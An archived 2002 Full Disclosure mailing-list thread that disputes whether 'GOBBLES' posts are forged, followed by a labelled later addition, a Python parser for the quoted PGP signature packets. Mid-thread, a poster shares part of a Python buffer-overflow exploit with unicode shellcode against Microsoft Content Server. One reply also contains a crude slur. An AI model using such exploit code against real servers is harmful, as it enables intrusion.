Full Disclosure
mailing list archives
ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p
From: full-disclosure () lists netsys com (Anthony LaMantia)
Date: 13 Aug 2002 19:24:43 -0700
lol, well bugtraq is no different the dallas proxy was hacked a month or
so back and all of the e-mail address it pwds: to published lol
besides don't you know this is the first front the anti-white-war started
by gayh1tler.. there is a lot of shit going down.. this list isn't gonna
be the worst part
-Anthony LaMantia
www.bia-security.com
On Wed, 2002-08-14 at 15:17, security-protocols () hushmail com wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Maybe no one has noticed this but,
this person is sending as 'gobbles () hush com' and not the real 'gobbles () hushmail com'.
See below:
@hush.com email addresses
27/7/02 - Is yourname @hushmail.com already taken? Sign up now for a hush.com email address.
- - -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
You supposed to be turkey friend turkey crew wanttobe yet you question
show respect to turkey
On 14 Aug 2002 17:06:11 -0400, full-disclosure () lists netsys com wrote:
At least you got the key id correct that time. It's not a valid
signature, but at least it produces one less error message.
-dave
ObExploit:
#fragment of my exploit for MS Content Server
#the full exploit can be found at https://immunitysec.com/members/
#but if you're not a member, this might save you some time writing your
#exploit.

    #returns the sploitstring
    def makesploit(self):
        header=""
        body=""
        body+="NR_DOMAIN=WinNT%3A%2F%2F"
        #1 alignment byte so we are word aligned with the return addr
        attack=""
        attack+="A"
        attack+="\x41\xb9"*4000
        #unicode shellcode!!
        attack=stroverwrite(attack,unicodeloop,1)
        print "length of overflow = "+str(len(attack))
        attack=urllib.quote(attack)
        #print attack
        body+=attack
        body+="&NR_DOMAIN_LIST=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=&NR_PASSWORD=&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuestLogin.asp"
        header+="POST /NR/System/Access/ManualLoginSubmit.asp HTTP/1.1\r\n"
        header+="Host: "+self.host+"\r\n"
        header+="User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob)\r\n"
        header+="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\r\n"
        header+="Connection: keep-alive\r\n"
        header+="Content-Type: application/x-www-form-urlencoded\r\n"
        header+="Content-Length: "+str(len(body))+"\r\n"
        header+="\r\n"
        return header+body

#this stuff happens.
if __name__ == '__main__':
    print "Running Microsoft Content Server exploit v 0.1"
    app = mscsexploit()
    if len(sys.argv) < 2:
        print "Usage: mycontent.py target [port] [ssl=0]"
        sys.exit()
    app.setHost(sys.argv[1])
    if len(sys.argv) > 2:
        app.setPort(int(sys.argv[2]))
    if len(sys.argv) > 3:
        app.setSSL(1)
    app.run()
On Wed, 2002-08-14 at 17:00, gobbles () hush com wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
or if you like
On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave () immunitysec com> wrote:
On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote:
Gobbles,
On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles () hush com wrote:
GOBBLES just want to be cool whitehat like everyone else. Time for new
leaf time for six figure salary stock option naked breasted assistant.
Word to that my man! ;)
peace,
core
Your message was signed, but the "GOBBLES" message was not and
therefore just a forgery, most likely.
BTW:
http://www.immunitysec.com/vulnerabilities/
They aren't advisories, but if you need something to show to your
boss about why you disconnected your Exchange/SQL server from the
Internet, it's a good start.
Dave Aitel
Immunity, Inc
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA
nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ==
=xfu0
-----END PGP SIGNATURE-----
Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2
Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
- - -----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
wlgEARECABgFAj1ayx0RHGdvYmJsZXNAaHVzaC5jb20ACgkQpmwDHEAx56uBwgCgrzaw
9J7jHuxLlnnPRAQi7pVgx/8An2SfUM0vQPa0Qb1kbwD1FouFtcWi
=9eW6
- - -----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
wmcEARECACcFAj1a1V8gHHNlY3VyaXR5LXByb3RvY29sc0BodXNobWFpbC5jb20ACgkQ
NAoGe68ymd16tACdGhj0H0rmHla8zAQMPX/Vh5Wya8QAn3FK7K4C1+h8RqTLjIBPKU3M
d18c
=gcJ+
-----END PGP SIGNATURE-----
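
Added example, not part of the original thread: Python 3 code that reads the first two OpenPGP signature packets quoted above and returns the signer user ID, issuer key ID and creation time each one asserts, which is the comparison the posters make between 'gobbles () hush com' and 'gobbles () hushmail com'. These fields are written by whoever produced the block and do not show that a signature is valid; that still requires checking it against the signer's public key. The function and variable names are this example's own.

```python
import base64
import struct

# Base64 bodies of the first two signature blocks quoted in this thread
# (armor header lines and the "=xxxx" CRC line left out).
SIG_A = ("wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA"
         "nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ==")
SIG_B = ("wlgEARECABgFAj1ayx0RHGdvYmJsZXNAaHVzaC5jb20ACgkQpmwDHEAx56uBwgCgrzaw"
         "9J7jHuxLlnnPRAQi7pVgx/8An2SfUM0vQPa0Qb1kbwD1FouFtcWi")


def _subpackets(area):
    """Yield (type, body) for each subpacket in a v4 subpacket area."""
    i = 0
    while i < len(area):
        n = area[i]
        i += 1
        if 192 <= n < 255:            # two-octet length
            n = ((n - 192) << 8) + area[i] + 192
            i += 1
        elif n == 255:                # five-octet length
            n = struct.unpack(">I", area[i:i + 4])[0]
            i += 4
        if n == 0 or i + n > len(area):
            raise ValueError("malformed subpacket area")
        yield area[i] & 0x7F, area[i + 1:i + n]  # drop the critical bit
        i += n


def signature_claims(b64):
    """Return the unverified metadata a v4 signature packet asserts."""
    raw = base64.b64decode(b64)
    if raw[0] != 0xC2 or raw[1] >= 192:
        raise ValueError("expected a short new-format signature packet")
    body = raw[2:2 + raw[1]]
    if len(body) != raw[1] or body[0] != 4:
        raise ValueError("truncated or not a version 4 signature")
    found = {}
    off = 4  # skip version, signature type, public-key and hash algorithm
    for _ in range(2):  # hashed area first, then unhashed
        (n,) = struct.unpack(">H", body[off:off + 2])
        for kind, data in _subpackets(body[off + 2:off + 2 + n]):
            found.setdefault(kind, data)  # value from the hashed area wins
        off += 2 + n
    return {
        "created": int.from_bytes(found.get(2, b""), "big") or None,
        "key_id": found.get(16, b"").hex().upper() or None,
        "user_id": found.get(28, b"").decode("ascii", "replace") or None,
    }
```

Calling `signature_claims(SIG_A)` and `signature_claims(SIG_B)` shows that the two blocks name different user IDs and different issuer key IDs.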